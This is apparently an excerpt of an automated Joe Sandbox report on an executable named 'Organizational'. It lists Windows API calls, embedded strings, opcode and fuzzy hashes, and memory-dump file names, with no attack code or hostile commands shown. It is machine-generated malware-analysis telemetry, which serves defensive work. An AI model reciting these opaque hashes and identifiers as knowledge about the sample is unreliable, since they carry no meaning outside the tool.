                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: 84d8957a1452376548fd1cdf3dca10400d891d6ca9ddb42a8bac7f5be6480732
                                                    • Instruction ID: 6be9e919a0488bedda2e05ebb33a928135af881b112d488eca91100cf68ff750
                                                    • Opcode Fuzzy Hash: 84d8957a1452376548fd1cdf3dca10400d891d6ca9ddb42a8bac7f5be6480732
                                                    • Instruction Fuzzy Hash: C4A17C716042059FCB14EF20C851A7AB7E5BF89310F148929F99A9B2D2DF74FC05EB92
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00F656E1
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00F656EC
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F656F7
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00F65702
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00F6570D
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00F65718
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00F65723
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00F6572E
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00F65739
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00F65744
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00F6574F
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00F6575A
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00F65765
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00F65770
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00F6577B
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00F65786
                                                    • GetCursorInfo.USER32(?), ref: 00F65796
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 00F657C1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: e1929cc94165accb5f5e58942d756ed0079e4fcb78c1c69a54989d53f402811d
                                                    • Instruction ID: db2ee52697d0378564ae816ceaefe7350f9aaec1dd72def43a342fe1a364b1e7
                                                    • Opcode Fuzzy Hash: e1929cc94165accb5f5e58942d756ed0079e4fcb78c1c69a54989d53f402811d
                                                    • Instruction Fuzzy Hash: E9415270E04319AADB109FBA8C49D6EFEF8EF51B20F10452FE509E7290DAB8A400DE51
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F4B17B
                                                    • __swprintf.LIBCMT ref: 00F4B21C
                                                    • _wcscmp.LIBCMT ref: 00F4B22F
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F4B284
                                                    • _wcscmp.LIBCMT ref: 00F4B2C0
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F4B2F7
                                                    • GetDlgCtrlID.USER32(?), ref: 00F4B349
                                                    • GetWindowRect.USER32(?,?), ref: 00F4B37F
                                                    • GetParent.USER32(?), ref: 00F4B39D
                                                    • ScreenToClient.USER32(00000000), ref: 00F4B3A4
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F4B41E
                                                    • _wcscmp.LIBCMT ref: 00F4B432
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F4B458
                                                    • _wcscmp.LIBCMT ref: 00F4B46C
                                                      • Part of subcall function 00F1385C: _iswctype.LIBCMT ref: 00F13864
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: 5b88a1be253a586a56650abf25db1eee47607df2ee91b3982361345775bb7a8b
                                                    • Instruction ID: 116198b68c23ecca1a1327f79997f9c8a66203d5609cdcbf6636c9c42bfa2ad2
                                                    • Opcode Fuzzy Hash: 5b88a1be253a586a56650abf25db1eee47607df2ee91b3982361345775bb7a8b
                                                    • Instruction Fuzzy Hash: D7A1F271604306AFD714DF64C884BEABBE8FF48324F104619FD99C21A2DB34E959EB90
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00F4BAB1
                                                    • _wcscmp.LIBCMT ref: 00F4BAC2
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F4BAEA
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F4BB07
                                                    • _wcscmp.LIBCMT ref: 00F4BB25
                                                    • _wcsstr.LIBCMT ref: 00F4BB36
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F4BB6E
                                                    • _wcscmp.LIBCMT ref: 00F4BB7E
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F4BBA5
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F4BBEE
                                                    • _wcscmp.LIBCMT ref: 00F4BBFE
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00F4BC26
                                                    • GetWindowRect.USER32(00000004,?), ref: 00F4BC8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: c0305eea5462012666add0dbb30bbd19a6e9a7a19c90c4e398adc460354a098b
                                                    • Instruction ID: 6e6034daba597b14dedeb3506c31298bb016daef8959c87a69636ebe8bca8daa
                                                    • Opcode Fuzzy Hash: c0305eea5462012666add0dbb30bbd19a6e9a7a19c90c4e398adc460354a098b
                                                    • Instruction Fuzzy Hash: 1681837140820A9BDB14DF14C8C5FAA7BE8FF84324F048569FE899A097DB34DD49EB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 77acab2416c5f812480e6e161c953b439b3c20e659809a483e0fa026f0c9f1b3
                                                    • Instruction ID: 950855e249eb5d1e56f243f409a3dc4d448a8a684f7a26b2fcdbd49db421c665
                                                    • Opcode Fuzzy Hash: 77acab2416c5f812480e6e161c953b439b3c20e659809a483e0fa026f0c9f1b3
                                                    • Instruction Fuzzy Hash: 3731C471A44205A6DB14EB60CD43EFE7BB4AF21760F600129F941B11D2EF59EE08FA53
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 00F4CBAA
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F4CBBC
                                                    • SetWindowTextW.USER32(?,?), ref: 00F4CBD3
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F4CBE8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F4CBEE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F4CBFE
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F4CC04
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F4CC25
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F4CC3F
                                                    • GetWindowRect.USER32(?,?), ref: 00F4CC48
                                                    • SetWindowTextW.USER32(?,?), ref: 00F4CCB3
                                                    • GetDesktopWindow.USER32 ref: 00F4CCB9
                                                    • GetWindowRect.USER32(00000000), ref: 00F4CCC0
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F4CD0C
                                                    • GetClientRect.USER32(?,?), ref: 00F4CD19
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F4CD3E
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F4CD69
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 8bf93dc88e3da8fcf40c9dd3f104511141cc46348d2bc29075d9dc40e2fbfa0e
                                                    • Instruction ID: 3923f8ae788e262ba4161249c4166e0e2845cad8b7d81d5fbec6e058e4134541
                                                    • Opcode Fuzzy Hash: 8bf93dc88e3da8fcf40c9dd3f104511141cc46348d2bc29075d9dc40e2fbfa0e
                                                    • Instruction Fuzzy Hash: 32518F31900709EFDB60DFA8CE89BAEBBF5FF44705F004518E646A25A0DB74A914EF50
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F7A87E
                                                    • DestroyWindow.USER32(00000000,?), ref: 00F7A8F8
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F7A972
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F7A994
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F7A9A7
                                                    • DestroyWindow.USER32(00000000), ref: 00F7A9C9
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EF0000,00000000), ref: 00F7AA00
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F7AA19
                                                    • GetDesktopWindow.USER32 ref: 00F7AA32
                                                    • GetWindowRect.USER32(00000000), ref: 00F7AA39
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F7AA51
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F7AA69
                                                      • Part of subcall function 00EF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00EF29BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 2dd8aee696d102e85698c8bb35b5f29ab3f5da2c41da18bafdba922ec100c19a
                                                    • Instruction ID: e02aee24be4875e958c92c4917d8df4f9a73b849665d02703846a77c3b04e087
                                                    • Opcode Fuzzy Hash: 2dd8aee696d102e85698c8bb35b5f29ab3f5da2c41da18bafdba922ec100c19a
                                                    • Instruction Fuzzy Hash: 6E71AB71540204AFE721DF28CC48FAA77E5EBC8310F55861EF989872A0DB34E915EB52
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DragQueryPoint.SHELL32(?,?), ref: 00F7CCCF
                                                      • Part of subcall function 00F7B1A9: ClientToScreen.USER32(?,?), ref: 00F7B1D2
                                                      • Part of subcall function 00F7B1A9: GetWindowRect.USER32(?,?), ref: 00F7B248
                                                      • Part of subcall function 00F7B1A9: PtInRect.USER32(?,?,00F7C6BC), ref: 00F7B258
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F7CD38
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F7CD43
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F7CD66
                                                    • _wcscat.LIBCMT ref: 00F7CD96
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F7CDAD
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F7CDC6
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F7CDDD
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F7CDFF
                                                    • DragFinish.SHELL32(?), ref: 00F7CE06
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F7CEF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: c64e913b4d5fad3983e2bf023c211997abdc4a1f96e35c97ea086d2baa52d505
                                                    • Instruction ID: 0772558ae5f9c1d2824cd51ba230cd3bc74eb56680d66b5356ebfc2c78e0c6f8
                                                    • Opcode Fuzzy Hash: c64e913b4d5fad3983e2bf023c211997abdc4a1f96e35c97ea086d2baa52d505
                                                    • Instruction Fuzzy Hash: C7617A71508304AFC711EF60DC85DABBBE8FFC9350F004A1EF695921A1DB709A09EB92
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 00F5831A
                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 00F58323
                                                    • VariantClear.OLEAUT32(00000000), ref: 00F5832F
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F5841D
                                                    • __swprintf.LIBCMT ref: 00F5844D
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00F58479
                                                    • VariantInit.OLEAUT32(?), ref: 00F5852A
                                                    • SysFreeString.OLEAUT32(?), ref: 00F585BE
                                                    • VariantClear.OLEAUT32(?), ref: 00F58618
                                                    • VariantClear.OLEAUT32(?), ref: 00F58627
                                                    • VariantInit.OLEAUT32(00000000), ref: 00F58665
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: cadac8eaca90b2fe5d30c537e971c0c13e232d22d1e23720beb0dd781fe70864
                                                    • Instruction ID: 7dc9d39b17e3eb1352c5c185f4099463948b545c13691f9bdab619522ceefcef
                                                    • Opcode Fuzzy Hash: cadac8eaca90b2fe5d30c537e971c0c13e232d22d1e23720beb0dd781fe70864
                                                    • Instruction Fuzzy Hash: E8D1DF72A04519DBDB109F61C885BAEB7B4BF04792F148155EA05FB290DF34EC4AFB90
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F74A61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F74AAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 45d7a976ad3541510216cae60b6d03c13410e2b0d56a995328aac82b3fe8683f
                                                    • Instruction ID: 9cefa641287b0eb0b46cfd94622d4cdb4f8f4f697f0e1d998170f75c9330e25f
                                                    • Opcode Fuzzy Hash: 45d7a976ad3541510216cae60b6d03c13410e2b0d56a995328aac82b3fe8683f
                                                    • Instruction Fuzzy Hash: 9C919E712047119BCB04EF20C851A7AB7E1BF94354F108859F99A6B3A2DF35FD49EB82
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00F5E31F
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F5E32F
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F5E33B
                                                    • __wsplitpath.LIBCMT ref: 00F5E399
                                                    • _wcscat.LIBCMT ref: 00F5E3B1
                                                    • _wcscat.LIBCMT ref: 00F5E3C3
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F5E3D8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5E3EC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5E41E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5E43F
                                                    • _wcscpy.LIBCMT ref: 00F5E44B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F5E48A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: bb3a356f84b960eabdce464f0d421a134f905ac78cc0a8c57953c2d04d818202
                                                    • Instruction ID: 20ba98230dfc227a17e606d602554e4f66240c2201ae5079005e01ea5e7b5f79
                                                    • Opcode Fuzzy Hash: bb3a356f84b960eabdce464f0d421a134f905ac78cc0a8c57953c2d04d818202
                                                    • Instruction Fuzzy Hash: 69616B765043059FC714EF60C844AAFB3E8FF89320F04891EFA8997251DB35EA49DB92
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F5A2C2
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F5A2E3
                                                    • __swprintf.LIBCMT ref: 00F5A33C
                                                    • __swprintf.LIBCMT ref: 00F5A355
                                                    • _wprintf.LIBCMT ref: 00F5A3FC
                                                    • _wprintf.LIBCMT ref: 00F5A41A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-3080491070
                                                    • Opcode ID: 279b85f47bacdc1876510d6804709c7896cf7367212a8a69dd3035edc2a7bcad
                                                    • Instruction ID: 0d556dc0306b0a4415e6975d211c89b3e98ce1746006b23f60048e05f844e248
                                                    • Opcode Fuzzy Hash: 279b85f47bacdc1876510d6804709c7896cf7367212a8a69dd3035edc2a7bcad
                                                    • Instruction Fuzzy Hash: BD518F72900219AADF15EBE0CD86EEEB779BF04341F104255F505B20A2EB396F58FB61
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F3F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F63FF9,00000000), ref: 00F5009A
                                                    • LoadStringW.USER32(00000000,?,00F3F8B8,00000001), ref: 00F500A3
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • GetModuleHandleW.KERNEL32(00000000,00FB7310,?,00000FFF,?,?,00F3F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F63FF9,00000000,00000001), ref: 00F500C5
                                                    • LoadStringW.USER32(00000000,?,00F3F8B8,00000001), ref: 00F500C8
                                                    • __swprintf.LIBCMT ref: 00F50118
                                                    • __swprintf.LIBCMT ref: 00F50129
                                                    • _wprintf.LIBCMT ref: 00F501D2
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F501E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: d763d5a3a53adca987ff26efc771d007063779cd483abf8e340badc95e628af1
                                                    • Instruction ID: 2f37241059fed2c92ea1492e32684e62260ab7cb9cee04c83a2f6c2f3ad3e561
                                                    • Opcode Fuzzy Hash: d763d5a3a53adca987ff26efc771d007063779cd483abf8e340badc95e628af1
                                                    • Instruction Fuzzy Hash: 67416C72800119AACB15EBE0CD96EEEB778BF14341F500165F601B2092EF38AF49FB61
                                                    APIs
